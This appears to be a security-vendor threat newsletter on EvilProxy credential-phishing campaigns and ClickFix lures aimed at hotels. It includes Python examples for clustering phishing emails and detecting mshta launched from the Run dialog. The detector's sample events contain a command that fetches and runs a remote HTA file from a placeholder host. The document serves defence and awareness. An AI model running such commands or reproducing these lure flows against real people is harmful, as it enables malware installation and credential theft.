Email Threat Radar – June 2025

During May, Barracuda threat analysts identified several notable email-based threats targeting organisations around the world and designed to evade detection and boost the chances of success, including:
- The EvilProxy phishing kit resurfacing with new attacks and tactics, such as:
  - Spoofing the Upwork employment platform
  - Sending fake Microsoft 365 security warnings
  - Invoice scam attacks with layered attachments for added deception
- Hospitality-themed phishing attacks using the ClickFix social engineering technique made popular by nation-state threat actors.
EvilProxy resurfaces with new tactics, spoofing a popular employment platform and sending fake Microsoft 365 warnings
Threat Snapshot
EvilProxy, a leading Phishing-as-a-Service (PhaaS) provider that was prolific in early 2025, has resurfaced with a range of innovative tactics designed to trick users into clicking on links and sharing credentials. The first of these is a wave of phishing attacks spoofing the trusted Upwork employment platform to send fake payment notifications.
Impersonating the Upwork Freelance Platform
The attacks begin with a legitimate-looking email that claims to notify the freelancer that they’ve been paid for recent work. For added credibility, the email pretends to come from a trusted Upwork customer.
There is a link in the body of the email inviting the recipient to view the details of the payment.
This link directs them to a ShareFile page where they are presented with another link.
If the target clicks this link, they are taken to a “verification” page to “prove” they are not a bot. This extra step is intended to make the process seem more legitimate and encourage the victim to continue.
The victim is then redirected to a fake login screen designed to steal their Microsoft login credentials, giving the attackers access to their personal accounts and sensitive data.
A New Twist On the Standard ‘Invoice Scam’ Involving Layered Attachments
Another set of EvilProxy attacks investigated by Barracuda threat analysts last month consisted of invoice scams that led victims through multiple attachments, each one taking them further away from protection.
These attacks begin with a message that looks like a legitimate payment confirmation and includes a .msg attachment. The .msg attachment claims to be a remittance note and includes an embedded image that is disguised as a PDF attachment. When the unsuspecting user clicks on the image, they are redirected via a malicious link to a Cloudflare Turnstile verification page.
The Turnstile check makes it harder for automated security tools to reach and inspect the EvilProxy phishing site to which the user is directed once they pass it. The phishing page is designed to steal the victim’s login credentials.
Fake Microsoft 365 Security Alerts
The threat analysts also found EvilProxy sending phishing emails disguised as Microsoft 365 login alerts. These alerts pretend to come from known and trusted security vendors.
In the campaign seen by Barracuda threat analysts, the attackers sent a range of emails with consistent body copy but three different subject lines. This tactic is often used by scammers to enable attacks to continue after security tools have spotted and blocked one of the subject lines.
The email warns recipients that they urgently need to block a particular IP address that is repeatedly trying to log in to their account, a common tactic for creating a sense of urgency and the need for prompt action.
The email carries an embedded link that users need to click to block the IP. This link takes them to a fake Microsoft login page, designed to steal their login credentials.
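One way a mail filter can counter the rotating-subject-line tactic described above is to fingerprint the normalised body copy, so messages sharing a body are grouped regardless of subject and blocking one subject extends to its siblings. This is an added example, not code from the Barracuda report; the messages, URLs and IP address are constructed sample data.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample messages for this example (not taken from the report):
# three alerts with identical body copy under rotating subject lines, plus one
# unrelated message that must not be grouped with them.
SAMPLE_MESSAGES = [
    {"id": "m1", "subject": "Security alert: unusual sign-in activity",
     "body": "A sign-in attempt from IP 203.0.113.7 was blocked.\n"
             "Click here to block this IP: https://example.invalid/a1"},
    {"id": "m2", "subject": "Action required: block suspicious IP",
     "body": "A sign-in attempt from IP 203.0.113.7 was blocked.\n\n"
             "Click here to block this IP:  https://example.invalid/zz9"},
    {"id": "m3", "subject": "Microsoft 365 login warning",
     "body": "a sign-in attempt from ip 203.0.113.7 was blocked. "
             "click here to block this ip: https://example.invalid/q"},
    {"id": "m4", "subject": "Your invoice is ready",
     "body": "Please find your invoice attached."},
]

URL_RE = re.compile(r"https?://\S+")

def body_fingerprint(body: str) -> str:
    """Hash the body after removing per-recipient noise: tracking URLs,
    letter case and whitespace differences do not change the fingerprint."""
    text = URL_RE.sub("<url>", body.lower())
    text = re.sub(r"\s+", " ", text).strip()
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def find_subject_rotation(messages, min_subjects=2):
    """Group messages by body fingerprint and return the clusters whose body
    was sent under at least `min_subjects` distinct subject lines."""
    clusters = defaultdict(lambda: {"subjects": set(), "ids": []})
    for msg in messages:
        cluster = clusters[body_fingerprint(msg["body"])]
        cluster["subjects"].add(msg["subject"])
        cluster["ids"].append(msg["id"])
    return {fp: c for fp, c in clusters.items() if len(c["subjects"]) >= min_subjects}

def related_subjects(messages, blocked_subject):
    """Once one subject line has been blocked, return the other subjects that
    share its body fingerprint so the whole campaign can be blocked at once."""
    fps = {body_fingerprint(m["body"]) for m in messages if m["subject"] == blocked_subject}
    return sorted({m["subject"] for m in messages
                   if body_fingerprint(m["body"]) in fps and m["subject"] != blocked_subject})
```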
Scammers Trick Users Into Attacking Themselves Using the ClickFix Technique
Threat Snapshot
ClickFix is a social engineering tactic popular with nation-state threat actors and now phishing gangs. It involves tricking victims into thinking there’s a problem with something they’re trying to do. An error message or prompt tells users they can fix the issue by copy-pasting some commands into a Windows dialog box. Running those commands lets the attackers execute malicious code on the victim’s computer.
ClickFix phishing scams don’t require the targets to open infected documents or click on malicious links. They rely on duping users into adding malicious commands themselves, and this makes such attacks harder for automated security systems to spot.
Recent examples seen by Barracuda mirror those seen elsewhere, targeting organisations in the hospitality sector and pretending to come from someone called “David” who had booked a hotel room via Booking.com but never received confirmation.
The emails use emotive language to ask the recipient to click on a link to verify the reservation before the customer loses money. To make the email feel even more authentic, it includes the “Sent from iPhone” signature.
Barracuda threat analysts have investigated two variants of the attack.
In the first variant, when users click the link, they’re taken to a page that looks like a standard “I’m not a robot” verification.
They are asked to follow a few simple instructions: press the Windows key + R, then Ctrl + V to paste a command, and press Enter. There’s a cleverly placed “Verify” button that silently copies a malicious command to the victim’s clipboard. When users follow the steps as instructed, they unknowingly execute that command. This downloads and silently runs malware in the background, giving attackers access to the victim’s system without any obvious signs of compromise.
Among other things, the attackers install malicious scripts that can steal sensitive information or install additional malware.
In the second variant of the attack, there’s no “Verify” button. Instead, the page displays a simple checkbox like a typical CAPTCHA. When users click the checkbox, it shows a brief loading animation, making it seem like an authentic verification process. However, behind the scenes, the page silently copies a malicious command to the user’s clipboard without their knowledge.
The command uses a built-in Windows tool that runs an HTML Application (HTA) file. While legitimate in purpose, such files are often exploited by attackers to run malicious scripts. In the incidents seen by Barracuda, the command connects to a URL that likely hosts a harmful HTA file or script designed to execute code on the victim’s system.
In both cases, the attackers’ goal is to deliver and run malicious code with minimal user interaction, using trusted Windows components to bypass security software and silently compromise the system.
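Both ClickFix variants end the same way in endpoint telemetry: a command pasted into the Win+R Run dialog starts a built-in script host, with explorer.exe as its parent and a URL on its command line. The following is an added defender-side example, not code from the report or from Barracuda; the report names only “a built-in Windows tool that runs an HTA file”, so treating mshta.exe as that host is this example’s assumption, and the event format, file paths and URLs are constructed sample data.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in a simplified Sysmon-style key=value form.
# They are sample data for this example, not telemetry from the incidents in the report.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=mshta https://example.invalid/verify.hta",
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=mshta https://example.invalid/verify.hta",
    "Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=mshta C:\\Tools\\local_app.hta",
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad https://example.invalid/readme.txt",
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Built-in Windows script hosts that execute content named on their command line (assumed set).
SCRIPT_HOSTS = {"mshta.exe"}
# A command pasted into the Win+R Run dialog is started by explorer.exe, so that
# parent is the tell-tale for the ClickFix flow described above.
SHELL_PARENTS = {"explorer.exe"}

def parse_event(line: str) -> dict:
    """Turn one 'key=value|key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event: dict) -> str:
    """Rate one process-creation event as 'high', 'medium' or 'none'."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    remote = bool(URL_RE.search(event["CommandLine"]))
    if image in SCRIPT_HOSTS and remote and parent in SHELL_PARENTS:
        return "high"    # script host pulling remote content, launched from the shell
    if image in SCRIPT_HOSTS and remote:
        return "medium"  # remote content, but not via the interactive Run dialog
    return "none"        # local HTA, or a non-script-host binary given a URL

def triage(lines):
    """Return (severity, command line) for every event not rated 'none'."""
    findings = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity != "none":
            findings.append((severity, event["CommandLine"]))
    return findings
```

In a real deployment the same rule is expressed against Sysmon Event ID 1 or Windows Security Event 4688 fields, and the parent-process check is what separates the pasted Run-dialog command from scripted administrative use.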